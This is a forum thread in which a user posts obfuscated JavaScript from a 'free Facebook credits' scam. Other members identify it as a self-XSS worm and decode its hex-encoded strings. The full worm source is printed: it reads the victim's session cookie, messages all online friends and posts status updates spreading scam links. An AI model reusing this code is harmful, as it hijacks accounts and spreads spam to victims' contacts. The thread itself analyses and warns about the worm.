Jump to content

What Does This Javascript Code Do?


555

Recommended Posts

I was surfing facebook and found this thing saying how to get 500 free FB credits, I figured it sounded funny so I looked at the source code but have no idea how to descript, or what it is saying on the last line, how do I decode it or what is this code doing?

var chatmessage = "Hey %firstname% have you heard about the facebook glitch you can get 500 facebook credits check it out. cvb.jrflinnaa.info/?40lyjl9";
  var postmessage = "%tf% %tf% %tf% %tf% %tf% %tf%\ndid you guys hear about the facebook glitch you can get 500 facebook credits ?check it out http://sdf.jrflinnaa.info/?zpzx6fb\n";
  var redirect = "http://jrflinna.info/final.php";
  var _0xb65c=["\x47\x45\x54","\x2F","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x6F\x73\x74\x20\x72\x65\x74\x75\x72\x6E\x65\x64\x20","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x73\x65\x6E\x64","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x70\x75\x73\x68","\x73\x68\x69\x66\x74","\x68\x6F\x6D\x65","\x25\x74\x66","\x25","\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x6D\x65\x73\x73\x61\x67\x65","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x6D\x6F\x62\x69\x6C\x65\x2F\x3F\x76\x3D\x70\x68\x6F\x74\x6F\x73","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2D\x57\x69\x74\x68","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64","\x6D\x61\x74\x63\x68\x3A\x20"];x1= new XMLHttpRequest();x1[_0xb65c[2]](_0xb65c[0],_0xb65c[1]);x1[_0xb65c[3]]=function (){if(x1[_0xb65c[4]]==4&&x1[_0xb65c[5]]==200){var _0xc3adx1=document[_0xb65c[7]][_0xb65c[6]](/c_user=(\d+)/)[1];var _0xc3adx2=3;var _0xc3adx3=function (_0xc3adx4){if(_0xc3adx4){return _0xb65c[8]+_0xc3adx4[_0xb65c[9]]+_0xb65c[10]+_0xc3adx4[_0xb65c[11]]+_0xb65c[12];} ;return _0xb65c[13];} ;var _0xc3adx5=function (_0xc3adx4){if(_0xc3adx4){return _0xc3adx4[_0xb65c[11]];} ;return _0xb65c[13];} ;var _0xc3adx6=function (_0xc3adx4){out=_0xb65c[13];for(var _0xc3adx7 in _0xc3adx4){out+=(out?_0xb65c[14]:_0xb65c[13])+_0xc3adx7+((_0xc3adx4[_0xc3adx7]!==null)?_0xb65c[15]+encodeURIComponent(_0xc3adx4[_0xc3adx7]):_0xb65c[13]);} ;return out;} ;var _0xc3adx8=(z=x1[_0xb65c[16]])[_0xb65c[6]](/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];if(true){var _0xc3adx9= new XMLHttpRequest();_0xc3adx9[_0xb65c[2]](_0xb65c[17],_0xb65c[18]);_0xc3adx9[_0xb65c[21]](_0xb65c[19],_0xb65c[20]);_0xc3adx9[_0xb65c[3]]=function (){if(_0xc3adx9[_0xb65c[4]]==4&&_0xc3adx9[_0xb65c[5]]==200){var _0xc3adxa=_0xc3adx9[_0xb65c[16]][_0xb65c[22]](9);var _0xc3adxb=eval(_0xb65c[23]+_0xc3adxa+_0xb65c[24]);var _0xc3adxc=_0xc3adxb[_0xb65c[26]][_0xb65c[25]];for(var _0xc3adxd in _0xc3adxc[_0xb65c[27]]){var _0xc3adxe=Math[_0xb65c[29]](Math[_0xb65c[28]]());var _0xc3adxf=( new Date())[_0xb65c[30]]();var _0xc3adx10=chatmessage;x5= new XMLHttpRequest();x5[_0xb65c[2]](_0xb65c[17],_0xb65c[31]);if(true){x5[_0xb65c[3]]=function (){if(x5[_0xb65c[4]]==4&&x5[_0xb65c[5]]==200){alert(_0xb65c[32]+_0xc3adx9[_0xb65c[16]]);} ;} ;} ;x5[_0xb65c[34]](_0xc3adx6({msg_id:_0xc3adxe,client_time:_0xc3adxf,to:_0xc3adxd,msg_text:_0xc3adx10,post_form_id_source:_0xb65c[33]}));} ;} ;} ;_0xc3adx9[_0xb65c[34]](_0xc3adx6({user:_0xc3adx1,lsd:null,post_form_id_source:_0xb65c[33],popped_out:false,force_render:true}));} ;if(true){var _0xc3adx11= new XMLHttpRequest();_0xc3adx11[_0xb65c[2]](_0xb65c[0],_0xb65c[35]+_0xc3adx1+_0xb65c[36]);_0xc3adx11[_0xb65c[3]]=function (){if(_0xc3adx11[_0xb65c[4]]==4&&_0xc3adx11[_0xb65c[5]]==200){var _0xc3adx12=_0xc3adx11[_0xb65c[16]][_0xb65c[6]](/\/\d+#\d+#\d+#q\.jpg.*?\\u003c\\\/>/gi);var _0xc3adx10=[];for(var _0xc3adx13=0;_0xc3adx13<_0xc3adx12[_0xb65c[37]];_0xc3adx13++){var _0xc3adx14=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/#\d+#/)[0][_0xb65c[38]](/#/g,_0xb65c[13]);var _0xc3adx15=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/>[^>]+\\u003c\\\/>$/i)[0][_0xb65c[38]](/\\u003c\\\/>$/gim,_0xb65c[13])[_0xb65c[38]](/>/g,_0xb65c[13]);_0xc3adx10[_0xb65c[39]]({id:_0xc3adx14,name:_0xc3adx15});} ;var _0xc3adx16=[];while(_0xc3adx16[_0xb65c[37]]<_0xc3adx2&&_0xc3adx10[_0xb65c[37]]){var _0xc3adx17=Math[_0xb65c[29]](Math[_0xb65c[28]]()*_0xc3adx10[_0xb65c[37]]);_0xc3adx16[_0xb65c[39]](_0xc3adx10[_0xc3adx17]);var _0xc3adxf=_0xc3adx10[_0xb65c[40]]();if(_0xc3adx17){_0xc3adx10[_0xc3adx17]=_0xc3adxf;} ;} ;var _0xc3adx18={composer_id:_0xc3adx8,context:_0xb65c[41],fbx:_0xb65c[13],lsd:null,post_form_id_source:_0xb65c[33]};mt=postmessage;_0xc3adx10=postmessage;for(var _0xc3adx13=1;_0xc3adx13<=_0xc3adx2;_0xc3adx13++){mt=mt[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx5(_0xc3adx16[_0xc3adx13-1]));_0xc3adx10=_0xc3adx10[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx3(_0xc3adx16[_0xc3adx13-1]));} ;_0xc3adx18[_0xb65c[44]]=mt;_0xc3adx18[_0xb65c[45]]=_0xc3adx10;x6= new XMLHttpRequest();x6[_0xb65c[2]](_0xb65c[17],_0xb65c[46]);x6[_0xb65c[34]](_0xc3adx6(_0xc3adx18));} ;} ;_0xc3adx11[_0xb65c[34]](null);} ;if(true){x4= new XMLHttpRequest();x4[_0xb65c[2]](_0xb65c[0],_0xb65c[47]);x4[_0xb65c[21]](_0xb65c[48],null);x4[_0xb65c[21]](_0xb65c[49],null);x4[_0xb65c[3]]=function (){if(x4[_0xb65c[4]]==4&&x4[_0xb65c[5]]==200){m=x4[_0xb65c[16]][_0xb65c[6]](/<div class="EmailIframe"><iframe src="[^\"]+.*<div>.*<\/div>"/)[0];alert(_0xb65c[50]+m);} ;} ;x4[_0xb65c[34]](null);} ;} ;} ;x1[_0xb65c[34]](null);

what exactly is all the stuff like "\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78"?

Link to comment
Share on other sites

All the \x69 stuff is obfuscated hex code, almost like shell code attacks to try and hide what it really says.

Looks like some XSS attack for Facebook. Don't paste the output it asks you to in the browser. There used to be an old hack to view peoples wall, pics etc, that used similar techniques, but this is definitely not good to run.

URL for the code I found at - http://sdf.jrflinnaa.info/e.js

Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.

Edited by digip
Link to comment
Share on other sites

<br />All the \x69 stuff is obfuscated hex code, almost like shell code attacks to try and hide what it really says.<br /><br />Looks like some XSS attack for Facebook. Don't paste the output it asks you to in the browser. There used to be an old hack to view peoples wall, pics etc, that used similar techniques, but this is definitely not good to run. <br /><br />URL for the code I found at - <a href='http://sdf.jrflinnaa.info/e.js' class='bbc_url' title='External link' rel='nofollow external'>http://sdf.jrflinnaa.info/e.js</a><br /><br />Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.<br />
<br /><br /><br />

Yeah that was the link. How can I un-obfuscate it to view what it says? So it is shell code? How does the browser even reconginize the hex code if it is encrypted/obfuscated? how do I create my own code like that? lol sorry for the thousand questions.

Link to comment
Share on other sites

Hex in JavaScript will automatically get written to plain text when the script runs, but there are a number of ways to obfuscate the code. I'm not too great at obfuscating stuff, but usually you write the output to an alert to see the result instead of letting it run normally. I often put the output to a text box so if it has another script inside of a script, it doesn't run.

I wrote a little piece on this a few years ago, but something like the code you have above requires several pieces of the puzzle to get the output. By itself you would have to decode the hex manually or write something to dump it since its variables and not a function in itself you can dump output from. Some scripts call multiple pieces to encode other bits of the scripts making it harder to decode them since it isn't all in one function or url location. They could break the codes up into multiple scripts across several domains, which makes it even harder to block, since the malicious code isn't in one script but in many, making the individual parts look benign.

Here is an example of how to decode very basic scripts so you can get an idea: http://www.twistedpairrecords.com/blog/2009/04/02/debugging-spam-code/

The first long hex string is

GET/openonreadystatechangereadyStatestatusmatchcookie@[id:name]&amp;=responseTextPOST/ajax/chat/buddy_list.php?__a=1Content-Typeapplication/x-www-form-urlencodedsetRequestHeadersubstr()buddy_listpayloadnowAvailableListrandomfloorgetTime/ajax/chat/send.php?__a=1post returned AsyncRequestsend/ajax/browser/friends/?uid=&amp;__a=1&amp;__d=1lengthreplacepushshifthome%tf%message_textmessage/ajax/updatestatus.php?__a=1/mobile/?v=photosX-Requested-WithX-Requestedmatch: 

Edited by digip
Link to comment
Share on other sites

Here is a simple example of a "hello world" but obfuscated with hex code.

&lt;html&gt;
&lt;head&gt;

&lt;script type="text/javascript"&gt;
function poop(){

	document.write("\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");
	}


&lt;/script&gt;

&lt;/head&gt;
&lt;body &gt;
\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E = &lt;script&gt;poop();&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

Link to comment
Share on other sites

humm.. so I used leetkey plugin to Hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex, useing asciitable.com will view the first hex.. which says "nothing for 5c which is the \ probuly, hex-#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x. hex#37=7, hex#, I dunno I think I am way off LOL  I will read the link you provided, thanks. There's not any kind of like firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

Edited by 555
Link to comment
Share on other sites

humm.. so I used leetkey plugin to Hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex, useing asciitable.com will view the first hex.. which says "nothing for 5c which is the \ probuly, hex-#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x. hex#37=7, hex#, I dunno I think I am way off LOL  I will read the link you provided, thanks. There's not any kind of like firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

For which link? The twistedpairrecords one? Thats my site. I can assure you, no exploit code, your anti-virus is just overactive and scanning for code and I have in the page, but not able to run natively since its just dumped to a text box. It must be looking at the plain text itself as executable code, or a heuristic scan, but complete false positive.

Link to comment
Share on other sites

Came across this JavaScript Obfuscator website.

http://www.javascriptobfuscator.com/

Link to comment
Share on other sites

  • 4 months later...

Remove the \x, convert the " and , to their hex numbers 22 & 2C, you get:

47 45 54 22 2C 22 2F 22 2C 22 6F 70 65 6E 22 2C 22 6F 6E 72 65 61 64 79 73 74 61 74 65 63 68 61 6E 67 65 22 2C 22 72 65 61 64 79 53 74 61 74 65 22 2C 22 73 74 61 74 75 73 22 2C 22 6D 61 74 63 68 22 2C 22 63 6F 6F 6B 69 65 22 2C 22 40 5B 22 2C 22 69 64 22 2C 22 3A 22 2C 22 6E 61 6D 65 22 2C 22 5D 22 2C 22 22 2C 22 26 22 2C 22 3D 22 2C 22 72 65 73 70 6F 6E 73 65 54 65 78 74 22 2C 22 50 4F 53 54 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 62 75 64 64 79 5F 6C 69 73 74 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 2C 22 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 22 2C 22 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 22 2C 22 73 75 62 73 74 72 22 2C 22 28 22 2C 22 29 22 2C 22 62 75 64 64 79 5F 6C 69 73 74 22 2C 22 70 61 79 6C 6F 61 64 22 2C 22 6E 6F 77 41 76 61 69 6C 61 62 6C 65 4C 69 73 74 22 2C 22 72 61 6E 64 6F 6D 22 2C 22 66 6C 6F 6F 72 22 2C 22 67 65 74 54 69 6D 65 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 73 65 6E 64 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 70 6F 73 74 20 72 65 74 75 72 6E 65 64 20 22 2C 22 41 73 79 6E 63 52 65 71 75 65 73 74 22 2C 22 73 65 6E 64 22 2C 22 2F 61 6A 61 78 2F 62 72 6F 77 73 65 72 2F 66 72 69 65 6E 64 73 2F 3F 75 69 64 3D 22 2C 22 26 5F 5F 61 3D 31 26 5F 5F 64 3D 31 22 2C 22 6C 65 6E 67 74 68 22 2C 22 72 65 70 6C 61 63 65 22 2C 22 70 75 73 68 22 2C 22 73 68 69 66 74 22 2C 22 68 6F 6D 65 22 2C 22 25 74 66 22 2C 22 25 22 2C 22 6D 65 73 73 61 67 65 5F 74 65 78 74 22 2C 22 6D 65 73 73 61 67 65 22 2C 22 2F 61 6A 61 78 2F 75 70 64 61 74 65 73 74 61 74 75 73 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 2F 6D 6F 62 69 6C 65 2F 3F 76 3D 70 68 6F 74 6F 73 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 2D 57 69 74 68 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 22 2C 22 6D 61 74 63 68 3A 20 22

Using the Hex to ASCII converter ( http://www.yellowpipe.com/yis/tools/encrypter/index.php ) the above converts to:

GET","/","open","onreadystatechange","readyState","status","match","cookie","@[","id",":","name","]","","&","=","responseText","POST","/ajax/chat/buddy_list.php?__a=1","Content-Type","application/x-www-form-urlencoded","setRequestHeader","substr","(",")","buddy_list","payload","nowAvailableList","random","floor","getTime","/ajax/chat/send.php?__a=1","post returned ","AsyncRequest","send","/ajax/browser/friends/?uid=","&__a=1&__d=1","length","replace","push","shift","home","%tf","%","message_text","message","/ajax/updatestatus.php?__a=1","/mobile/?v=photos","X-Requested-With","X-Requested","match:],

From there, I searched Google, and found this page, which appears to have the entire code (The above is at line 24):

http://pastebin.com/tY6wqti2

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...